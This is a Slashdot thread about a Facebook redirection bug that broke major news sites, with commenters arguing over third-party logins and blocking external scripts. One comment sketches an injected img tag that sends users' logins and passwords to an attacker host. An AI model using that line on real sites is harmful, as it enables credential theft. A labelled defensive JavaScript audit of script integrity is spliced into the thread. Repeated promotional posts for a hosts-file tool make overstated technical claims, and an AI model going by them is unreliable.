Facebook Breaks Major Websites With Redirection Bug

Soulskill posted about a year and a half ago | from the now-we're-tripping-on-virtual-power-cords dept.

Bug 179

johnsnails writes "Some of the biggest news sites in the world disappeared yesterday when Facebook took over the internet with a redirection bug. Visitors to sites such as The Washington Post, BuzzFeed, the Gawker network, NBC News and News.com.au were immediately transferred to a Facebook error page upon loading their intended site. It was fixed quickly, and Facebook provided this statement: 'For a short period of time, there was a bug that redirected people logging in with Facebook from third party sites to Facebook.com. The issue was quickly resolved, and Login with Facebook is now working as usual.'"

so... (5, Insightful)

liamevo (1358257) | about a year and a half ago | (#42831337)

can we please stop relying on third parties for things *you* should be providing to your users.

Re:so... (5, Funny)

Seumas (6865) | about a year and a half ago | (#42831385)

Hey, just because all of my forum stuff comes from Disqus, my word of mouth spreading comes from twitter, facebook, and google plus integrations, and my content comes from automatic AP feeds doesn't mean I don't provide anything myself! I . . . . uh . . . .

Re:so... (5, Funny)

saveferrousoxide (2566033) | about a year and a half ago | (#42832599)

I deal with the goddamn customers!

Re:so... (1)

sinij (911942) | about a year and a half ago | (#42834057)

>>>I deal with the goddamn customers! And if you don't like it, you can program goddamn login page yourself!

Re:so... (1)

rwise2112 (648849) | about a year and a half ago | (#42834091)

I deal with the goddamn customers!

I have people skills, damnit!

Re:so... (1)

LandDolphin (1202876) | about a year and a half ago | (#42834145)

haha

Re:so... (2)

davester666 (731373) | about a year and a half ago | (#42834207)

...said the person who just finished installing an autoreply bot...

Re:so... (4, Interesting)

CastrTroy (595695) | about a year and a half ago | (#42833195)

I know a guy who does this. He pulls in about $50 a month with a site that basically runs itself. The only reason I don't do it is because the "ads" he ends up generating money off of are the kind that pay out when the visitor to his site installs a tool bar or some other nefarious thing. The only reason I wouldn't do that is that I don't think it's ethically correct to lure people into installing stuff they don't want on their computer. But I imagine that someone who's ambitious enough, and who sets up enough sites could generate quite a bit of money like this.

It Has Its Ups and Downs (5, Interesting)

eldavojohn (898314) | about a year and a half ago | (#42831509)

can we please stop relying on third parties for things *you* should be providing to your users.

Clearly it has benefits and disadvantages. One of the disadvantages is displayed in this story. I could name a decent amount of benefits though: 1) you don't have to register again and again every time you want to use some site. 2) you don't suffer from password fatigue. 3) you don't have to worry about no talent ass clowns storing your username and password in plaintext (although you do have to worry about facebook being no talent ass clowns about that). 4) if I just want to stand up a quick little site that is nothing more than CRUD associated to users then all that login stuff can be offloaded to facebook or whomever. 5) from a large corporation standpoint, you can now get additional social data about your users from the facebook api (I know, this isn't necessarily an advantage for the end user and is best viewed as double edged).

Are you opposed to openID too [wikipedia.org] ?

Re:It Has Its Ups and Downs (4, Insightful)

Rockoon (1252108) | about a year and a half ago | (#42831691)

Indeed.

I think many people are in support of third party authentication semantics for non-critical sites..

Even though ultimately facebook is probably a bad choice for it, what else is so ubiquitous as to be a reasonable option that also doesn't suffer the same essential problems (certainly not a google account?)

Re:It Has Its Ups and Downs (5, Interesting)

whargoul (932206) | about a year and a half ago | (#42832051)

...what else is so ubiquitous as to be a reasonable option that also doesn't suffer the same essential problems (certainly not a google account?)

I use Twitter when the option is available only because they don't collect data on me like facebook does. If it's facebook only, I usually won't sign up.

Re:It Has Its Ups and Downs (3, Interesting)

DragonWriter (970822) | about a year and a half ago | (#42832601)

Even though ultimately facebook is probably a bad choice for it, what else is so ubiquitous as to be a reasonable option that also doesn't suffer the same essential problems (certainly not a google account?)

OpenID. Sure, a provider having a similar error could stop users of that provider from logging on to your site, but it's not a single point of failure for the entire site, it's a single point of failure for the user and all the sites they use it to log into.

Re:It Has Its Ups and Downs (0)

Anonymous Coward | about a year and a half ago | (#42834289)

To prevent that single point of failure I just don't use facebook for login credentials, ever.

Re:It Has Its Ups and Downs (2, Insightful)

DogDude (805747) | about a year and a half ago | (#42831759)

from a large corporation standpoint, you can now get additional social data about your users from the facebook api (I know, this isn't necessarily an advantage for the end user and is best viewed as double edged).

For an individual, there's only one edge: a sharp one. Who in their right mind would want every company/web site to know all of the intimate details of what they're doing on every other web site? Isn't it obvious to people that by signing in with a Facebook ID to web sites, that not only does Facebook track everything done, but then sells that information to everybody else? That's how those extremely complete personal profiles are created about individuals in corporate databases that are then swapped and sold indefinitely. What benefit could this possibly have for individuals?

Re:It Has Its Ups and Downs (2)

Sockatume (732728) | about a year and a half ago | (#42832219)

If Facebook sold that information you'd have a point, but as it's not disclosed in any of their privacy literature that'd be a monstrous and legally actionable breach of their information protection obligations.

Re:It Has Its Ups and Downs (2, Insightful)

DogDude (805747) | about a year and a half ago | (#42832753)

Hey kid, I've got a bridge to sell ya'....

Re: It Has Its Ups and Downs (0)

Anonymous Coward | about a year and a half ago | (#42831805)

No talent ass clowns can still create apps that expose a permanent security token...So people get full access not only to that account but also most of your Facebook. And the process for revoking that access is more difficult than the average password change...

"is best viewed as double edged" LOL (0)

Anonymous Coward | about a year and a half ago | (#42832163)

I think you meant "is best viewed as A double edged SWORD"... stop rewriting the language.

Re:It Has Its Ups and Downs (0)

Anonymous Coward | about a year and a half ago | (#42833357)

Bonus advantage: you don't have to worry about anyone who doesn't use/want to use facebook wanting to use your site.

Re:It Has Its Ups and Downs (1)

intoxination (1806616) | about a year and a half ago | (#42833713)

This wasn't limited to sites that use Facebook Connect though. It also affected sites that have the Facebook Like button on it, as that apparently relies on connect. So you think you got something really simple on your site that an outage like this shouldn't affect, yet it does.

Re:so... (5, Insightful)

orthancstone (665890) | about a year and a half ago | (#42831533)

On one hand, I'd prefer to see authentication in the hands of someone I consider more reliable (like Google) than some programmer of questionable ability at (Insert Random Dying Newspaper here).

On the other hand, a hearty "HA HA!" does feel appropriate here. They do get what they are asking for by being so deeply tied to a third party.

What's also interesting... (3, Interesting)

raehl (609729) | about a year and a half ago | (#42831807)

...I got this bug on a website I do *NOT* use Facebook to log into, so the Facebook statement appears incorrect in that regard. (I was logged into Facebook in that browser though.)

Re:so... (1)

hobarrera (2008506) | about a year and a half ago | (#42831889)

IMHO, OpenID is better. Whether google is trustworthy or not is a matter of opinion, and google can be just another OpenID provider. If we want a single provider, the world will never settle for a single trusted entity.

Re:so... (1)

squiggleslash (241428) | about a year and a half ago | (#42832443)

Kinda. The thing is that the reliable programmers who specialize in this kind of thing work for companies like Disqus, whose jobs revolve 100% around this. However, random PHB at ${dying newspaper} has never heard of Disqus, but has heard of Facebook, which similarly to the newspaper employs many programmers, few of whom consider it the primary job of their organization to help, and not f--- up, third party websites.

If Disqus (or Livewyre or whatever) ever made this kind of screw up, they'd seriously destroy their credibility, but unfortunately....

Re:so... (1)

deains (1726012) | about a year and a half ago | (#42831763)

Let's just get in touch with every CDN in existence and get them to shut down everything they're doing then. Clearly centralising providers of commonly-used resources is an abysmally terrible idea.
 
(Sarcasm, just in case you can't tell)

Re:so... (1)

ElmoGonzo (627753) | about a year and a half ago | (#42832223)

I've less quarrel with the concept of using a 3rd party to verify identity (that's what a driver's license does when we aren't on line) than with the notion of using the services of a "free" site that gets its revenue by tracking its users and selling that information to advertisers and the like. And do I want to stay logged in to something like Facebook when it is exposing my information (not all of which is bogus fiction) to anyone who has access to their API? And yes, Google is doing much of the same as are numerous others.

Re:so... (1)

Dragonslicer (991472) | about a year and a half ago | (#42833665)

Exactly. After all, nobody that's ever written their own authentication code has ever screwed it up.

Re:so... (0)

Anonymous Coward | about a year and a half ago | (#42834131)

Just think, every single one of those websites is feeding Facebook tracking info about its users, that facebook then resells to advertisers and stuff..

Congrats (5, Insightful)

Anonymous Coward | about a year and a half ago | (#42831347)

If you let others insert scripts into your pages they can steal your visitors.

Maybe it'll make sites think about who they script src from.

Re:Congrats (4, Insightful)

FireFury03 (653718) | about a year and a half ago | (#42831725)

If you let others insert scripts into your pages they can steal your visitors.

Maybe it'll make sites think about who they script src from.

One of the bad things I've noticed recently is that HSBC [hsbc.co.uk] is including objects from third party organisations in their ebanking login pages. I do wonder if any thought has gone into the security of such things, or if HSBC simply don't care (my experience of banks tells me that none of them have a single clue when it comes to internet security).

Re:Congrats (1)

Anonymous Coward | about a year and a half ago | (#42832615)

Use RequestPolicy and you'll be in control of what websites include from third parties.

Re:Congrats (0)

CanHasDIY (1672858) | about a year and a half ago | (#42832693)

If you let others insert scripts into your pages they can steal your visitors.

Maybe it'll make sites think about who they script src from.

One of the bad things I've noticed recently is that HSBC [hsbc.co.uk] is including objects from third party organisations in their ebanking login pages. I do wonder if any thought has gone into the security of such things, or if HSBC simply don't care (my experience of banks tells me that none of them have a single clue when it comes to internet security).

HSBC launders money for drug kingpins and terrorists. [forbes.com]

You should really find a new bank.

Re:Congrats (2, Funny)

Anonymous Coward | about a year and a half ago | (#42833015)

Well if drug kingpins and terrorists use them, they must be a pretty good bank.

Re:Congrats (0)

Anonymous Coward | about a year and a half ago | (#42834129)

Maybe that's why I'm a customer!

And... (1)

Anonymous Coward | about a year and a half ago | (#42831365)

...people wonder why some of us block external crap on sites, not just ads.

Re:And... (0, Offtopic)

Anonymous Coward | about a year and a half ago | (#42831941)

I shudder thinking what havoc you could cause if you'd manage to hijack one of big JS library CDNs.

For example, just imagine every copy of jQuery from Google's CDN also including instructions to add '<img src="http://buttfuck.me/lol?domain=$window.domain&login=$login&pass=$pass">' on clicking login button - even if it'd be up for just a few minutes, you'd still probably get millions of user accounts sent to you.

Economical impact would be huge, with thousands of sites scouring logs and resetting compromised logins and users having to check and reset every password.

Only a tiny minority uses NoScript, and then some sites require scripts to function - so you should also use some tricks to replace them with locally cached versions. I really hope those CDN servers are in secure location with write access only for verified personnel physically present on site.
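
Added example (not part of any comment in this thread, and not code from Slashdot, Facebook or any CDN): a site-side audit for the risk raised in the "Congrats" and "And..." sub-threads, listing third-party `<script src>` tags that lack a Subresource Integrity pin and checking a fetched body against its pin the way a browser would. The hostnames, script bodies and HTML are constructed sample data, and the regex tag scan is a simplification that assumes no `>` inside attribute values.

```javascript
// Audit third-party <script src> tags for Subresource Integrity (SRI) pins.
const { createHash } = require("node:crypto");

// Relative strength of the hash algorithms SRI defines.
const STRENGTH = { sha256: 1, sha384: 2, sha512: 3 };

// Build an SRI value ("sha384-<base64 digest>") for a script body.
function sriHash(body, alg = "sha384") {
  return `${alg}-${createHash(alg).update(body, "utf8").digest("base64")}`;
}

// Parse the attribute text of one tag into a lower-cased name -> value map.
function parseAttrs(attrText) {
  const attrs = {};
  const re = /([^\s=>"'/]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+)))?/g;
  let m;
  while ((m = re.exec(attrText)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4] ?? "";
  }
  return attrs;
}

// Return one finding per script loaded from an origin other than the page's.
function auditScripts(html, pageUrl) {
  const pageOrigin = new URL(pageUrl).origin;
  const findings = [];
  for (const m of html.matchAll(/<script\b([^>]*)>/gi)) {
    const attrs = parseAttrs(m[1]);
    if (!attrs.src) continue;                  // inline script, nothing fetched
    const url = new URL(attrs.src, pageUrl);   // resolves relative and //host forms
    if (url.origin === pageOrigin) continue;   // first-party script
    const integrity = attrs.integrity || null;
    findings.push({
      src: url.href,
      origin: url.origin,
      integrity,
      status: integrity ? "pinned" : "missing-integrity",
    });
  }
  return findings;
}

// Check a fetched body against an integrity attribute. As in browsers, only
// the pins using the strongest listed algorithm count, and any one of them
// matching is enough. An empty or unparseable attribute is reported as a
// failure here, although a browser would load such a script unchecked.
function verifyBody(body, integrity) {
  const pins = (integrity || "")
    .split(/\s+/)
    .map((tok) => /^(sha256|sha384|sha512)-([A-Za-z0-9+/=_-]+)/.exec(tok))
    .filter(Boolean)
    .map((m) => ({ alg: m[1], digest: m[2] }));
  if (pins.length === 0) return false;
  const best = Math.max(...pins.map((p) => STRENGTH[p.alg]));
  return pins
    .filter((p) => STRENGTH[p.alg] === best)
    .some((p) => sriHash(body, p.alg) === `${p.alg}-${p.digest}`);
}

// ---- Constructed sample data (not taken from any real site) ----
const GOOD_BODY = "window.lib = { version: 1 };";
const TAMPERED_BODY = GOOD_BODY + "/* injected */";
const PAGE_URL = "https://news.example/story";
const SAMPLE_HTML = `
<script src="/js/app.js"></script>
<script src="https://cdn.example/lib.js" integrity="${sriHash(GOOD_BODY)}" crossorigin="anonymous"></script>
<script async src="//widgets.example/sdk.js"></script>
<script>var inline = true;</script>`;

for (const f of auditScripts(SAMPLE_HTML, PAGE_URL)) {
  console.log(`${f.status.padEnd(18)} ${f.src}`);
}
console.log("pinned body intact:  ", verifyBody(GOOD_BODY, sriHash(GOOD_BODY)));
console.log("pinned body tampered:", verifyBody(TAMPERED_BODY, sriHash(GOOD_BODY)));
```

A widget the provider changes in place (the `widgets.example` case) cannot be pinned to a hash; the usual containment is to load it inside an `iframe` whose `sandbox` attribute omits `allow-top-navigation`, so it cannot redirect the embedding page.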

Re:And... (2)

lattyware (934246) | about a year and a half ago | (#42833875)

Which is why we should be asking for two-factor auth on every site, and using unique random passwords stored in a password vault for websites that need passwords. That way, if someone gets your password, it's a) useless without your phone b) useless for any other site. Unfortunately, it's extra hassle for developer and end user, so only a few people do it.

Good. (1)

Seumas (6865) | about a year and a half ago | (#42831367)

Serves every one of these websites right for being Facebook lemmings.

Re:Good. (2, Funny)

Anonymous Coward | about a year and a half ago | (#42831451)

They prefer to be called facebook serfs

Re:Good. (1)

jadv (1437949) | about a year and a half ago | (#42831711)

Nowadays they call them "employees" because the word "serf" has been banned by the PC crowd.

use adblock+ to block social media extensions (1)

Anonymous Coward | about a year and a half ago | (#42831375)

The fanboy adblock lists include another list you can add which also blocks out all social media badges etc.

Re:use adblock+ to block social media extensions (1)

Hsien-Ko (1090623) | about a year and a half ago | (#42831483)

Ghostery is another weapon in the defense too

Ghostery = Advertiser owned (-1)

Anonymous Coward | about a year and a half ago | (#42831677)

Per my subject above: They're "foxes guard the henhouse" -> http://it.slashdot.org/comments.pl?sid=3445509&cid=42831613 [slashdot.org] so you'd have to be a real 'cluck' to use them (pun intended) & AdBlock? Crippled by default & NO LONGER BLOCKS ALL ADS either!

APK

P.S.=> Just some "FYI" that has concrete solid undeniable & verifiable backing from reputable sources in the link above...

... apk

AdBlock & Ghostery = inferior to hosts (-1, Offtopic)

Anonymous Coward | about a year and a half ago | (#42831613)

Especially on this note of redirection (hosts file hardcodes stop that, for one thing, ALONG WITH ADBANNERS TOO - plus custom hosts files can do 10 things listed below, adblock can't, period...):

---

APK Hosts File Engine 5.0++ 32/64-bit:

http://start64.com/index.php?option=com_content&view=article&id=5851:apk-hosts-file-engine-64bit-version&catid=26:64bit-security-software&Itemid=74 [start64.com]

Which, if you read the list of what it can do for you as an end user of the resulting output it produces listed in the link above, you'll understand how/why...

"It's as strong as steel, & a 3rd of the weight" - Howard Stark from the film "Captain America"

---

Especially vs. competing alternate 'solutions', noted below in AdBlock/Ghostery & yes even DNS servers, next, as 'examples thereof'...

Solutions that used to be good & I even recommended them in security guides I wrote up over the decades now -> http://www.google.com/search?hl=en&tbo=d&output=search&sclient=psy-ab&q=%22HOW+TO+SECURE+Windows+2000/XP%22&btnG=Submit&gbv=1&sei=ka3yUKzxB-6_0QHLroCQCA [google.com]

That did extremely well for myself (and users of them), for Windows users, for "layered-security"/"defense-in-depth" purposes - the BEST THING WE HAVE GOING vs. threats of all kinds, currently!

(Not anymore though, & certainly NOT far as AdBlock's concerned especially, not after this):

---

Adblock Plus To Offer 'Acceptable Ads' Option:

http://news.slashdot.org/story/11/12/12/2213233/adblock-plus-to-offer-acceptable-ads-option [slashdot.org]

(Meaning by default, which MOST USERS WON'T CHANGE, it doesn't block ALL ads - they "souled-out"... talk about "foxes guarding the henhouse")!

---

Plus, Adblock CAN'T DO AS MUCH & not from a single file solution that runs in Ring 0/RPL 0/kernelmode via tcpip.sys, a driver (since it's part of the IP stack & tightly integrated into it) which is far, Far, FAR FASTER than ring 3/rpl 3/usermode apps like browsers, & addons slow them down (known issue in FireFox).

To wit, 10++ things AdBlock can't do, hosts can:

---

1.) Blocking rogue DNS servers malware makers use

2.) Blocking known sites/servers that serve up malware... like known sites/servers/hosts-domains that serve up malicious scripts

3.) Speeding up your FAVORITE SITES that hosts can speed up via hardcoded line item entries properly resolved by a reverse DNS ping

4.) AdBlock works on Mozilla products (browser & email), hosts work on ANY webbound app AND are multiplatform.

5.) AdBlock can't protect external to FireFox email programs, hosts can (think OUTLOOK, Eudora, & others)

6.) AdBlock can't help you blow past DNSBL's (DNS block lists)

7.) AdBlock can't help you avoid DNS request logs (hosts can via hardcoded favorites)

8.) AdBlock can't protect you vs. TRACKERS (hosts can)

9.) AdBlock can't protect you vs. DOWNED or "DNS-poisoned" redirected DNS servers (hosts can by hardcodes)

10.) Hosts are EASIER to manage, they're just a text file (adblock means you had BEST know your javascript, perl, & python (iirc as to what languages are used to make it from source)).

& more... as a tiny 'sampling' & proofs thereof!

---

Same with Ghostery:

---

Evidon, which makes Ghostery, is an advertising company.

They were originally named Better Advertising, Inc., but changed their name for obvious PR reasons.

Despite the name change, let's be clear on one thing: their goal still is building better advertising, not protecting consumer privacy.

Evidon bought Ghostery, an independent privacy tool that had a good reputation.

They took a tool that was originally for watching the trackers online, something people saw as a legitimate privacy tool, and users were understandably concerned.

The company said they were just using Ghostery for research. Turns out they had relationships with a bunch of ad companies and were compiling data from which sites you visited when you were using Ghostery, what trackers were on those sites, what ads they were, etc., and building a database to monetize.

(AND, when confronted about it, they made their tracking opt-in and called it GhostRank, which is how it exists today.)

They took an open-source type tool, bought it, turned it from something that's actually protecting people from the ad industry, to something where the users are actually providing data to the advertisers to make it easier to track them. This is a fundamental conflict of interest.

To sum up:

Ghostery makes its money from selling supposedly de-identified user data about sites visited and ads encountered to marketers and advertisers. You get less privacy, they get more money.

That's an inverse relationship.

Better Advertising/Evidon continually plays up the story that people should just download Ghostery to help them hide from advertisers.

Their motivation to promote it, however, isn't for better privacy; it's because they hope that you'll opt in to GhostRank and send you a bunch of information.

They named their company Better Advertising for a reason: their incentive is better advertising, not better privacy.

---

Yes, so overall? Absolutely - hosts are superior!

Vs. even DNS servers too (which hosts files can supplement to overcome THEIR shortcomings, as follows):

---

A.) Running another program (sometimes in usermode no less, far, Far, FAR slower than kernelmode by many orders of magnitude & easily attacked) vs. the single hosts file (tightly integrated into the IP stack itself as part of it). ADDING COMPLEXITY & MORE "moving parts" room for error & breakdown!

B.) Wasting CPU cycles, RAM memory, & other forms of I/O to do what a single file can do

C.) Wasting ELECTRICITY (especially if the DNS server is setup as a separate machine) even if run as a service/daemon on a single system as user has

D.) DNS has NUMEROUS faults, & should anyone request a sampling of them? Ask & "ye shall receive"...

---

Thus, using custom hosts actually SUPPLEMENTS DNS servers & secures them vs. the 1/2 decade unpatched Kaminsky bug, worldwide, worst of all @ the ISP Level, & results in BETTER security AND in saving your bandwidth & giving you FASTER host-domain name resolution locally vs. remote DNS servers, especially if a NXDOMAIN results since you do it LOCALLY via verified hardcoded hosts file entries of your favorites, which also gets you speed too as noted), simply to overcome that flaw & others!

Hosts files hardcodes are not only faster, but safer too, simply since my program uses reverse DNS hardcoded entries tests, to the in arpa addr 'tld' that houses that information from the DNSSEC root 13 servers by ICANN & VERISIGN (to proof vs. the Kaminsky redirect flaw (that remains unpatched for 1/2 a decade now on MOST DNS servers worldwide, worst of all, @ the ISP level!) - which are secured vs. that flaw noted above in redirect poisonings & others)

---

HOWEVER:

I don't "hate" DNS servers!

In fact - I use them myself (since I don't attempt to resolve 'every host-domain there is online' via hosts, only my favorites @ the top of the file, 20 of them, which beats hashtable indexing or b-tree binary seeks past 2++ million records no less).

I use specialized FILTERING DNS SERVERS that help block out malicious sites/servers/hosts-domains via DNSBLs:

---

Norton DNS:

http://setup.nortondns.com/ [nortondns.com]


OpenDNS:

http://www.opendns.com/home-solutions/ [opendns.com]

208.67.222.222
208.67.220.220

ScrubIT DNS:

http://scrubit.com/ [scrubit.com]

67.138.54.100
207.225.209.66

Comodo Secure DNS:

http://www.comodo.com/secure-dns/switch/windows_vista.html [comodo.com]

8.26.56.26
8.20.247.2

---

ALL in layered formation in both my network connection AND my Cisco/LinkSys stateful packet inspecting router.

(Again - for the concept of "layered-security"/"defense-in-depth": The best thing we have going currently vs. malicious threats online & otherwise...)

---

(Resulting in security AND in saving your bandwidth & giving you FASTER host-domain name resolution locally vs. remote DNS servers, especially if a NXDOMAIN results since you do it LOCALLY via verified hardcoded hosts file entries of your favorites, which also gets you speed too as noted), simply to overcome that flaw & others!

Hosts files hardcodes are not only faster, but safer too, simply since my program uses reverse DNS hardcoded entries tests, to the in arpa addr 'tld' that houses that information from the DNSSEC root 13 servers by ICANN & VERISIGN (to proof vs. the Kaminsky redirect flaw (that remains unpatched for 1/2 a decade now on MOST DNS servers worldwide, worst of all, @ the ISP level!) - which are secured vs. that flaw noted above in redirect poisonings & others)

---

* :)

(Beat THAT with a stick... or better yet? With information that disproves my points (to any 'naysayers' or trolls, that is)).

The Advertiser isn't exactly "straight-up" with you either. Witness these events:

---

Adbanners slow you down & consume your bandwidth YOU pay for (40% of your avg. webpage no less):

ADBANNERS SLOW DOWN THE WEB: -> http://tech.slashdot.org/article.pl?sid=09/11/30/166218 [slashdot.org]

---

And people do NOT LIKE ads on the web:

PEOPLE DISLIKE ADBANNERS: http://yro.slashdot.org/yro/08/04/02/0058247.shtml [slashdot.org]

---

As well as this:

Users Know Advertisers Watch Them, and Hate It:

http://yro.slashdot.org/yro/08/04/02/0058247.shtml [slashdot.org]

---

Even WORSE still, is this:

Advertising Network Caught History Stealing:

http://yro.slashdot.org/story/11/07/22/156225/Advertising-Network-Caught-History-Stealing [slashdot.org]

---

Advertisers never intended to honor "DNT" (Do Not Track):

http://yro.slashdot.org/story/12/09/23/1334258/advertisers-never-intended-to-honor-dnt [slashdot.org]

---

AND, neither do others:

http://yro.slashdot.org/story/12/09/30/1435231/think-tanks-website-rejects-browser-do-not-track-requests [slashdot.org]

---

The webserver program folks even "jumped on the bandwagon" in Apache, as far as "DNT":

http://apache.slashdot.org/story/12/09/08/0053235/apache-patch-to-override-ie-10s-do-not-track-setting [slashdot.org]

---

Talk about "crooked" & telling 1/2 truths (as well as making software that was ONCE quite useful & effective, NOT QUITE AS USEFUL & EFFECTIVE by default anymore!)

Now - I truly KNOW this post will no doubt be downmodded, because Advertisers do NOT want this type of information getting out en-masse to enlighten users - they bought out Ghostery, crippled Adblock, but TRY THAT with a local hosts file (good luck!) especially one a user builds himself!

APK

P.S.=> Malware's present in the banner ads you click on as well, & here are some "examples thereof" over time:

---

THE NEXT AD YOU CLICK MAY BE A VIRUS:

http://it.slashdot.org/story/09/06/15/2056219/The-Next-Ad-You-Click-May-Be-a-Virus [slashdot.org]

---

Yahoo, Microsoft's Bing display toxic ads:

http://www.theregister.co.uk/2011/09/16/bing_yahoo_malware_ads/ [theregister.co.uk]

---

Malware torrent delivered over Google, Yahoo! ad services:

http://www.theregister.co.uk/2009/09/24/malware_ads_google_yahoo/ [theregister.co.uk]

---

Rogue ads infiltrate Expedia and Rhapsody:

http://www.theregister.co.uk/2008/01/30/excite_and_rhapsody_rogue_ads/ [theregister.co.uk]

---

Google sponsored links caught punting malware:

http://www.theregister.co.uk/2008/12/16/google_sponsored_links/ [theregister.co.uk]

---

DoubleClick caught supplying malware-tainted ads:

http://www.theregister.co.uk/2007/11/13/doubleclick_distributes_malware/ [theregister.co.uk]

---

Yahoo feeds Trojan-laced ads to MySpace and PhotoBucket users:

http://www.theregister.co.uk/2007/09/11/yahoo_serves_12million_malware_ads/ [theregister.co.uk]

---

Real Media attacks real people via RealPlayer:

http://www.theregister.co.uk/2007/10/23/real_media_serves_malware/ [theregister.co.uk]

---

Attacks Targeting Classified Ad Sites Surge:

http://it.slashdot.org/story/11/02/02/1433210/Attacks-Targeting-Classified-Ad-Sites-Surge [slashdot.org]

---

Hackers Respond To Help Wanted Ads With Malware:

http://it.slashdot.org/story/11/01/20/0228258/Hackers-Respond-To-Help-Wanted-Ads-With-Malware [slashdot.org]

---

Ruskie gang hijacks Microsoft network to push penis pills:

http://www.theregister.co.uk/2010/10/12/microsoft_ips_hijacked/ [theregister.co.uk]

---

Major ISPs Injecting Ads, Vulnerabilities Into Web:

http://it.slashdot.org/story/08/04/19/2148215/major-isps-injecting-ads-vulnerabilities-into-web [slashdot.org]

---

Two Major Ad Networks Found Serving Malware:

http://tech.slashdot.org/story/10/12/13/0128249/Two-Major-Ad-Networks-Found-Serving-Malware [slashdot.org]

---

NY TIMES INFECTED WITH MALWARE ADBANNER:

http://news.slashdot.org/story/09/09/13/2346229/new-york-times-site-pop-up-says-your-computer-is-infected [slashdot.org]

---

MICROSOFT HIT BY MALWARES IN ADBANNERS:

http://apcmag.com/microsoft_apologises_for_serving_malware.htm [apcmag.com]

---

ADOBE FLASH ADS INJECTING MALWARE INTO THE NET:

http://it.slashdot.org/story/08/08/20/0029220/adobe-flash-ads-launching-clipboard-hijack-attacks [slashdot.org]

---

London Stock Exchange Web Site Serving Malware:

http://www.securityweek.com/london-stock-exchange-web-site-serving-malware [securityweek.com]

---

Spotify splattered with malware-tainted ads:

http://www.theregister.co.uk/2011/03/25/spotify_malvertisement_attack/ [theregister.co.uk]

---

Demonoid Down For a Week, Serving Malware Laden Ads:

http://yro.slashdot.org/story/12/08/02/1427257/demonoid-down-for-a-week-serving-malware-laden-ads [slashdot.org]

---

Google's DoubleClick spreads malicious ads (again):

http://www.theregister.co.uk/2009/02/24/doubleclick_distributes_malware/ [theregister.co.uk]

---

Ad networks owned by Google, Microsoft serve malware:

http://www.theregister.co.uk/2010/12/13/doubleclick_msn_malware_attacks/ [theregister.co.uk]

---

Hackers Use Banner Ads on Major Sites to Hijack Your PC:

http://www.wired.com/techbiz/media/news/2007/11/doubleclick [wired.com]

---

More dangerous to click on an online advertisement than an adult content site these days, Cisco said:

http://www.securityweek.com/easier-get-infected-malware-good-sites-shady-sites-cisco-says [securityweek.com]

---

As my list "multiple evidences thereof" as to adbanners & viruses + the fact they slow you down & cost you more (from reputable & reliable sources no less).

(Animats/John Nagle, a member here no less who himself contributed to the IP stack itself & I respect him immensely for it, unlike many here (especially trolls) said it best on advertisers & the web -> http://yro.slashdot.org/comments.pl?sid=3359149&cid=42482289 [slashdot.org] )

... apk

Re:AdBlock & Ghostery = inferior to hosts (1)

omnichad (1198475) | about a year and a half ago | (#42832183)

Oh, great. Good plan. Completely block Facebook with a hosts file. This only affected logged in Facebook users. People who aren't going to add facebook's scripting domains to their hosts file.

NOT about hosts ability to BLOCK (0)

Anonymous Coward | about a year and a half ago | (#42832415)

It's about how hosts hardcodes avoid redirects (hosts can do that)!

I.E. -> You can also avoid DNS servers being unpatched for 1/2 a decade now (even though a fix exists, worst of all, @ the ISP level), AND likely this redirect problem for facebook technically as well:

---

5 Years After Major DNS Flaw Found, Few US Companies Have Deployed Long-term Fix:

http://it.slashdot.org/story/13/01/29/1859257/5-years-after-major-dns-flaw-found-few-us-companies-have-deployed-long-term-fix [slashdot.org]

---

Again - Since hardcodes in hosts determine the host-domain name resolution 1st:

---

Microsoft TCP/IP Host Name Resolution Order:

http://support.microsoft.com/kb/172218 [microsoft.com]

PERTINENT QUOTE/EXCERPT:

"The client checks to see if the name queried is its own.

The client then searches a local Hosts file, a list of IP address and names stored on the local computer.

A sample hosts file, Hosts.sam, is installed with the TCP/IP protocol showing the proper format.

Domain Name System (DNS) servers are queried.

If the name is still not resolved, NetBIOS name resolution sequence is used as a backup. This order can be changed by configuring the NetBIOS node type of the client."

---

Loaded @ OS startup too, by the IP stack itself (since host are TIGHTLY INTEGRATED as part of it also) running in Ring 0/RPL 0/kernelmode (vs. far, Far, FAR SLOWER usermode/Ring 3/RPL 3 & slower code in addons (ala AdBlock's python/javascript code) + browser addons SLOW DOWN WEBBROWSERS (known issue in FireFox, stack up a few & see for yourself)...

AND

Hosts are referred to by default FIRST by ANY WEBBOUND APP:

Including webbrowsers & their addons (which CANNOT resolve ip addresses "by themselves") which makes AdBlock or Ghostery, redundant (especially since they're advertiser)...

APK

P.S.=>

Re:NOT about hosts ability to BLOCK (1)

UnknownSoldier (67820) | about a year and a half ago | (#42833973)

On all my systems I replace hosts with this nice updated ad/spy/trojan blocking one:
        http://winhelp2002.mvps.org/hosts.txt [mvps.org]

Can fellow /. readers recommend any other good ones?

Custom hosts = Superior to AdBlock (-1, Troll)

Anonymous Coward | about a year and a half ago | (#42831729)

Especially in regard to redirection bugs (even from DNS poisonings, ala the unpatched for 1/2 a decade especially @ the ISP level, in the Kaminsky flaw) for BOTH added speed & security:

APK Hosts File Engine 5.0++ 32/64-bit:

http://start64.com/index.php?option=com_content&view=article&id=5851:apk-hosts-file-engine-64bit-version&catid=26:64bit-security-software&Itemid=74 [start64.com]

Which, if you read the list of what it can do for you as an end user of the resulting output it produces listed in the link above, you'll understand how/why...

"It's as strong as steel, & a 3rd of the weight" - Howard Stark from the film "Captain America"

---

Especially vs. competing alternate 'solutions', noted below in AdBlock/Ghostery & yes even DNS servers, next, as 'examples thereof'...

Solutions that used to be good & I even recommended them in security guides I wrote up over the decades now -> http://www.google.com/search?hl=en&tbo=d&output=search&sclient=psy-ab&q=%22HOW+TO+SECURE+Windows+2000/XP%22&btnG=Submit&gbv=1&sei=ka3yUKzxB-6_0QHLroCQCA [google.com]

That did extremely well for myself (and users of them), for Windows users, for "layered-security"/"defense-in-depth" purposes - the BEST THING WE HAVE GOING vs. threats of all kinds, currently!

(Not anymore though, & certainly NOT far as AdBlock's concerned especially, not after this):

---

Adblock Plus To Offer 'Acceptable Ads' Option:

http://news.slashdot.org/story/11/12/12/2213233/adblock-plus-to-offer-acceptable-ads-option [slashdot.org]

(Meaning by default, which MOST USERS WON'T CHANGE, it doesn't block ALL ads - they "souled-out"... talk about "foxes guarding the henhouse")!

---

